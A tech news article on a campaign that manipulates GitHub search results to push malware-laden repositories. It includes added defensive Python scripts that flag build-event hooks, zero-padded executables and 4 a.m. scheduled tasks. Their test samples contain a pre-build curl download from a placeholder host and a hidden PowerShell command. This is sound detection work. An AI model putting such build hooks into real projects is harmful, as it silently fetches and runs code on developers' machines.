GitHub search results manipulated to spread malware


Mélina LOUPIA

April 14, 2024 at 5:13 p.m.


Hackers manipulated GitHub’s search functionality and used meticulously crafted repositories to distribute malware.

GitHub, the collaborative platform that is a favourite playground for developers, is hard to avoid. Although it recently became more secure with the introduction of passkeys as a replacement for passwords, Checkmarx researchers are warning its users about a serious malware distribution campaign.

They found that hackers are manipulating GitHub search results to deliver persistent malware to developers’ systems. By creating malicious repositories with popular names and topics, cybercriminals exploit GitHub features to reach a large audience.

Pushing malicious repositories up the GitHub search results

The attackers behind this campaign use several techniques to improve the ranking of their malicious repositories in search results. One is to use GitHub Actions to update the repositories automatically and at a very high frequency: a scheduled workflow commits a trivial change, typically writing the current date and time to a file usually named "log", or some other small random edit. This constant activity artificially boosts the visibility of the repositories, especially when users sort their search results by most recently updated, and so increases the chance that unsuspecting developers find and clone them.

On top of these automatic updates, the attackers use a second technique to make their repositories look credible: multiple fake accounts add fake stars, giving an impression of popularity and trustworthiness. Finally, to evade detection, they hide the malicious code inside the Visual Studio project files (.csproj or .vcxproj), where a build event runs it automatically as soon as the project is built.
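To make these two tricks concrete, here is an added triage script for a cloned repository; it is not code from Checkmarx, GitHub or the attackers. It flags build-time command hooks in .csproj/.vcxproj files and scheduled workflows that commit trivial changes. The embedded project and workflow files are constructed samples, and the list of hook elements and the "churn" heuristics are assumptions chosen for illustration; only the Python standard library is used.

```python
"""Triage a cloned repository for the two tricks described above:
(1) build-time command hooks in Visual Studio project files, and
(2) GitHub Actions workflows that commit trivial changes on a schedule.
Added example (not Checkmarx's, GitHub's or the attackers' code); the
sample files at the bottom are constructed, and the hook tag list and the
churn heuristics are assumptions chosen for illustration."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

MSBUILD_NS = "{http://schemas.microsoft.com/developer/msbuild/2003}"
# MSBuild elements whose content is handed to a shell during a build.
HOOK_TAGS = {"PreBuildEvent", "PostBuildEvent", "PreLinkEvent", "Exec"}

def find_build_hooks(xml_text):
    """Return (tag, command) pairs for elements that run commands at build time.
    Covers namespaced (old-style) and SDK-style projects, <Exec Command="..."/>,
    <PreBuildEvent>cmd</PreBuildEvent> (csproj) and
    <PreBuildEvent><Command>cmd</Command></PreBuildEvent> (vcxproj)."""
    hooks = []
    for elem in ET.fromstring(xml_text).iter():
        tag = elem.tag.replace(MSBUILD_NS, "")
        if tag not in HOOK_TAGS:
            continue
        cmd = elem.get("Command")
        if cmd is None:
            cmd = elem.text or ""
            for child in elem:
                if child.tag.replace(MSBUILD_NS, "") == "Command":
                    cmd = child.text or ""
        if cmd.strip():
            hooks.append((tag, cmd.strip()))
    return hooks

CRON_RE = re.compile(r"^\s*-\s*cron:\s*['\"]?([^'\"\n#]+)", re.M)
COMMIT_RE = re.compile(r"git\s+(?:commit|push)\b|git-auto-commit-action|add-and-commit", re.I)
TOUCH_RE = re.compile(r"(?:date|echo\b[^\n]*)\s*>>?\s*\S*log\b", re.I)

def is_high_frequency(cron):
    """True when a 5-field cron fires at least hourly (minute '*' or '*/N', or hour '*')."""
    f = cron.split()
    return len(f) == 5 and (f[0] == "*" or f[0].startswith("*/") or f[1] == "*")

def workflow_churn(yaml_text):
    """Heuristic: scheduled trigger plus a commit/push of a trivial change such as
    appending the date to a file named 'log'. Plain regexes, so no YAML parser needed."""
    crons = [c.strip() for c in CRON_RE.findall(yaml_text)]
    return {"crons": crons,
            "high_frequency": any(is_high_frequency(c) for c in crons),
            "commits": bool(COMMIT_RE.search(yaml_text)),
            "touches_log": bool(TOUCH_RE.search(yaml_text))}

def triage_contents(files):
    """files maps repo-relative path -> text. Returns a list of findings."""
    findings = []
    for path, text in files.items():
        p = path.replace("\\", "/")
        if p.endswith((".csproj", ".vcxproj")):
            for tag, cmd in find_build_hooks(text):
                findings.append({"file": p, "kind": "build-hook", "detail": f"<{tag}> {cmd}"})
        elif p.startswith(".github/workflows/") and p.endswith((".yml", ".yaml")):
            w = workflow_churn(text)
            if w["crons"] and w["commits"] and (w["high_frequency"] or w["touches_log"]):
                findings.append({"file": p, "kind": "churn-workflow",
                                 "detail": f"cron={w['crons']} touches_log={w['touches_log']}"})
    return findings

def triage_repo(root):
    """Walk a checked-out repository and triage its project and workflow files."""
    root = Path(root)
    files = {str(f.relative_to(root)): f.read_text(errors="replace")
             for f in root.rglob("*")
             if f.is_file() and f.suffix in {".csproj", ".vcxproj", ".yml", ".yaml"}}
    return triage_contents(files)

# Constructed samples, not taken from any real repository.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <PropertyGroup>
    <TargetFramework>net8.0</TargetFramework>
    <PreBuildEvent>curl -s https://example.invalid/x.7z -o %TEMP%\\x.7z</PreBuildEvent>
  </PropertyGroup>
</Project>"""
SAMPLE_VCXPROJ = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemDefinitionGroup>
    <PreBuildEvent><Command>powershell -w hidden -c "echo constructed"</Command></PreBuildEvent>
  </ItemDefinitionGroup>
</Project>"""
CLEAN_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk"><PropertyGroup>
  <OutputType>Exe</OutputType></PropertyGroup></Project>"""
SAMPLE_WORKFLOW = """name: update
on:
  schedule:
    - cron: '*/5 * * * *'
jobs:
  touch:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - run: date >> log
      - run: git add log && git commit -m update && git push
"""

if __name__ == "__main__":
    if len(sys.argv) > 1:
        results = triage_repo(sys.argv[1])
    else:
        results = triage_contents({"a.csproj": SAMPLE_CSPROJ, "b.vcxproj": SAMPLE_VCXPROJ,
                                   "clean.csproj": CLEAN_CSPROJ,
                                   ".github/workflows/update.yml": SAMPLE_WORKFLOW})
    for r in results:
        print(f"{r['kind']:15} {r['file']}: {r['detail']}")
```

Run it with the path of a freshly cloned repository as the only argument, or with no argument to see it flag the constructed samples. A build hook is not proof of malice on its own (many legitimate projects run scripts before a build), so treat each finding as something to read before you open the solution in Visual Studio, where the first build would execute it.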

Vigilance is required for developers © Maor_Winetrob / Shutterstock


Maintain malware persistence with a scheduled task

The researchers noticed that the payload delivered depends on the victim's location. In the recent campaign, the attackers used a large executable that shares similarities with the "Keyzetsu clipper" malware, known for targeting crypto wallets. On April 3, 2024, the attacker updated the code in one of their repositories to point to a new URL that downloads an encrypted .7z archive containing an executable named feedbackAPI.exe.

To push the file size past the upload limits of various security solutions, including VirusTotal, the attackers padded the executable with a large run of zero bytes, so that it cannot be submitted for scanning. The malware maintains persistence by creating a scheduled task that launches the executable every day at 4 a.m., with no user interaction. This use of malicious GitHub repositories to distribute malware is a real blight on the open source ecosystem.
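The zero-padding trick is easy to check for on a sample you have in hand. The script below is an added example, not code from the original report: it measures the run of trailing zero bytes, flags the file when that run is both large and most of the file, and hashes the unpadded prefix so the real binary can still be looked up or submitted to a scanner. The sample bytes are constructed, and the 1 MiB and 50% thresholds are assumptions.

```python
"""Flag executables padded with trailing zero bytes to push them over the
size limits of scanners such as VirusTotal (the trick described above), and
hash the unpadded prefix so that the real file can still be looked up or
submitted. Added example (not from the original report); the samples are
constructed and the 1 MiB / 50% thresholds are assumptions."""
import hashlib
import mmap

CHUNK = 1 << 20  # scan backwards 1 MiB at a time so huge files stay cheap

def trailing_zero_run(data):
    """Number of 0x00 bytes at the end of data (bytes or mmap)."""
    n = end = len(data)
    while end > 0:
        start = max(0, end - CHUNK)
        kept = bytes(data[start:end]).rstrip(b"\x00")
        if kept:                      # last non-zero byte lives in this chunk
            return n - (start + len(kept))
        end = start                   # whole chunk was zeros, keep going back
    return n

def sha256_range(data, start, end):
    """SHA-256 of data[start:end] without copying the whole slice at once."""
    h = hashlib.sha256()
    for off in range(start, end, CHUNK):
        h.update(data[off:min(off + CHUNK, end)])
    return h.hexdigest()

def analyze(data, min_pad=1 << 20, min_ratio=0.5):
    """Report padding statistics and both hashes; 'suspicious' when at least
    min_pad bytes of trailing zeros make up at least min_ratio of the file."""
    n = len(data)
    pad = trailing_zero_run(data)
    ratio = pad / n if n else 0.0
    return {"size": n, "is_pe": bytes(data[:2]) == b"MZ", "padding": pad,
            "ratio": round(ratio, 3),
            "suspicious": pad >= min_pad and ratio >= min_ratio,
            "sha256_full": sha256_range(data, 0, n),
            "sha256_unpadded": sha256_range(data, 0, n - pad)}

def analyze_file(path):
    """Memory-map the file so multi-hundred-megabyte samples are not read into RAM."""
    with open(path, "rb") as f:
        with mmap.mmap(f.fileno(), 0, access=mmap.ACCESS_READ) as m:
            return analyze(m)

# Constructed samples: a tiny fake "PE" followed by 2 MiB of zeros, and a clean one.
FAKE_BODY = b"MZ" + b"fake PE body " * 100
PADDED_SAMPLE = FAKE_BODY + b"\x00" * (2 << 20)
CLEAN_SAMPLE = FAKE_BODY + b"\x00" * 512   # section alignment padding, harmless

if __name__ == "__main__":
    for name, blob in (("padded", PADDED_SAMPLE), ("clean", CLEAN_SAMPLE)):
        print(name, analyze(blob))
```

The unpadded hash is the useful one: the padded file is unique to this campaign and too large to upload, while the prefix is what the attacker actually built. Note that a small tail of zeros is normal in PE files because of section alignment, which is why both an absolute and a relative threshold are applied.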

From now on, simply checking for known vulnerabilities no longer seems enough: regular review of the code pulled from open source platforms, which are, as we know, not necessarily the most secure, is required as well.
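For anyone who has already built one of these projects, the persistence mechanism described above leaves a concrete trace to hunt for. The script below is an added example, not from the original report: it reads the verbose CSV export of Windows scheduled tasks and reports tasks that both run daily at 4:00 AM and launch a binary from a user-writable location. The embedded CSV is constructed and keeps only a subset of the columns schtasks emits, and the task name and paths in it are assumptions.

```python
"""Hunt for the persistence described above in a verbose export of Windows
scheduled tasks: a daily task starting at 4:00 AM whose binary sits in a
user-writable location. Collect with `schtasks /query /fo CSV /v > tasks.csv`
on the host and pass the file in. Added example, not from the original
report; the CSV below is constructed, keeps only a subset of the columns
schtasks emits, and its task name and paths are assumptions."""
import csv
import io
import re
import sys

# Locations a non-admin user can write to; the %VAR% forms cover unexpanded paths.
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|ProgramData|Temp|Public)\\|%(?:TEMP|TMP|APPDATA|LOCALAPPDATA)%",
    re.I)

def suspicious_tasks(csv_text, start_time="4:00:00 AM"):
    """Return tasks that are both scheduled daily at start_time and launch a
    binary from a user-writable path; either trait alone is common and benign."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row.get("TaskName") == "TaskName":   # schtasks repeats the header per host
            continue
        cmd = row.get("Task To Run", "")
        daily_at = (row.get("Schedule Type", "").strip().lower() == "daily"
                    and row.get("Start Time", "").strip() == start_time)
        if daily_at and USER_WRITABLE.search(cmd):
            hits.append({"task": row["TaskName"], "run": cmd,
                         "user": row.get("Run As User", ""),
                         "author": row.get("Author", "")})
    return hits

# Constructed sample with a subset of the schtasks /v columns.
SAMPLE_CSV = r'''"HostName","TaskName","Author","Task To Run","Run As User","Schedule Type","Start Time","Start Date"
"DEV01","\feedbackAPI","DEV01\dev","C:\Users\dev\AppData\Local\Temp\feedbackAPI.exe","DEV01\dev","Daily","4:00:00 AM","4/4/2024"
"DEV01","\Microsoft\Windows\Defrag\ScheduledDefrag","Microsoft Corporation","%windir%\system32\defrag.exe -c","SYSTEM","Weekly","1:00:00 AM","1/1/2024"
"DEV01","\NightlyBackup","DEV01\ops","C:\Program Files\Backup\backup.exe","SYSTEM","Daily","4:00:00 AM","2/2/2024"
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as f:
            text = f.read()
    else:
        text = SAMPLE_CSV
    for hit in suspicious_tasks(text):
        print(hit)
```

The two conditions are combined on purpose: a 4 AM daily task on its own matches plenty of legitimate maintenance jobs, and a binary under AppData on its own matches every per-user installer, but the pair is what the report describes. Adjust the start time if a later sample changes it.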

Sources: Security Affairs, Checkmarx

Mélina LOUPIA

Ex-corporate journalist, the world of the web, networks, connected machines and everything that is written on the Internet whets my appetite. From the latest TikTok trend to the most liked reels, I come from the Facebook generation that is still fascinated by the internal war between Mac and PC. As a wise woman, the Internet, its tools, practices and regulation are among my favorite hobbies (along with lineart, knitting and bad jokes). My motto: to try it is to adopt it, but in complete safety.
